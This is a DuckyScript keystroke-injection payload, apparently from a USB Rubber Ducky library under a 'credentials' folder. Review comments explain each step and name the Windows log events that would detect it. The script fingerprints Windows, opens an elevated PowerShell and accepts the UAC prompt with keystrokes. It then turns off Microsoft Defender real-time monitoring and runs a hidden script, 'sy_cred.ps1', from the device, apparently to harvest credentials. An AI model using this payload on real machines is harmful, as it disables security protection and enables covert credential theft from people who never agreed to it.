Path: blob/master/payloads/library/credentials/Duckie-Harvest/payload.txt
REM Summary of what this listing does, for review and triage:
REM   1. The device enumerates as a USB keyboard plus mass storage.
REM   2. PASSIVE_WINDOWS_DETECT sets $_OS from USB enumeration counters.
REM   3. On Windows it opens PowerShell elevated through the Run dialog and
REM      types commands that switch off Microsoft Defender real-time
REM      monitoring, then starts the script named by #PS1 from the device's
REM      own storage volume in a hidden window.
REM The script itself (sy_cred.ps1) is not part of this listing. Nothing
REM visible here turns real-time monitoring back on afterwards.
ATTACKMODE HID STORAGE
EXTENSION PASSIVE_WINDOWS_DETECT
    REM VERSION 1.1
    REM AUTHOR: Korben

    REM_BLOCK DOCUMENTATION
        Windows fully passive OS Detection and passive Detect Ready
        Includes its own passive detect ready.
        Does not require additional extensions.

        USAGE:
            Extension runs inline (here)
            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
            boot delay
            $_OS will be set to WINDOWS or NOT_WINDOWS
            See end of payload for usage within payload
    END_REM

    REM CONFIGURATION:
    REM The wait loop below runs at most #MAX_WAIT times with a DELAY of
    REM #CHECK_INTERVAL each time, i.e. roughly 150 x 20 ms = 3 s at most.
    DEFINE #MAX_WAIT 150
    DEFINE #CHECK_INTERVAL 20
    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
    DEFINE #NOT_WINDOWS 7

    REM Default to NOT_WINDOWS; only the check after the loop upgrades it.
    $_OS = #NOT_WINDOWS

    VAR $MAX_TRIES = #MAX_WAIT
    REM Poll until the host has answered a lock-LED request or the retry
    REM budget is used up. No keystrokes are sent during this phase.
    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
        DELAY #CHECK_INTERVAL
        $MAX_TRIES = ($MAX_TRIES - 1)
    END_WHILE
    REM More than #WINDOWS_HOST_REQUEST_COUNT configuration requests from
    REM the host is treated as the Windows fingerprint.
    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
        $_OS = WINDOWS
    END_IF

    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
        IF ($_OS == WINDOWS) THEN
            STRING HELLO WINDOWS!
        ELSE
            STRING HELLO WORLD!
        END_IF
    END_REM
END_EXTENSION

REM #DUCKY_DRIVER_LABEL is the volume label used to find the device's storage
REM drive letter; #PS1 is the file name handed to powershell.exe -File.
DEFINE #DUCKY_DRIVER_LABEL DUCKY
DEFINE #PS1 sy_cred.ps1

REM Everything below runs only when the extension reported WINDOWS.
IF ($_OS == WINDOWS )THEN

    DELAY 200
    REM -----open Powershell as Admin
    REM Run dialog, then CTRL-SHIFT ENTER requests an elevated launch.
    GUI r
    DELAY 200
    STRING powershell
    CTRL-SHIFT ENTER
    DELAY 400
    REM NOTE(review): LEFT then ENTER presumably selects and confirms the
    REM approve button of the UAC consent dialog. This is inferred, since the
    REM dialog is not visible in the script. A standard-user account gets a
    REM credential prompt instead, which these two keys cannot satisfy.
    LEFT
    DELAY 150
    ENTER
    DELAY 500
    REM Review notes for the typed block that follows (the block's text is
    REM kept flush left so reformatting adds no whitespace to what is typed):
    REM   - Set-MpPreference -DisableRealtimeMonitoring $true needs an elevated
    REM     session and is refused when Defender Tamper Protection is enabled.
    REM     When it succeeds, Defender records event ID 5001 in the
    REM     Microsoft-Windows-Windows Defender/Operational log.
    REM   - The hidden child process is visible to process-creation logging
    REM     with command lines (Security 4688 or Sysmon 1): powershell.exe with
    REM     -NoProfile -WindowStyle Hidden -File, started from a removable
    REM     drive. Script block logging (4104) records the typed commands.
    REM   - The volume lookup depends on a removable volume labelled DUCKY
    REM     being mounted; removable-storage device control blocks this stage.
    STRINGLN_POWERSHELL

$duckletter = (Get-CimInstance -ClassName Win32_LogicalDisk | Where-Object { $_.VolumeName -eq '#DUCKY_DRIVER_LABEL' }).DeviceID;cd $duckletter
Set-MpPreference -DisableRealtimeMonitoring $true
Start-Process powershell.exe -ArgumentList "-NoProfile -WindowStyle Hidden -File #PS1" -WindowStyle Hidden
exit

    END_STRINGLN

END_IF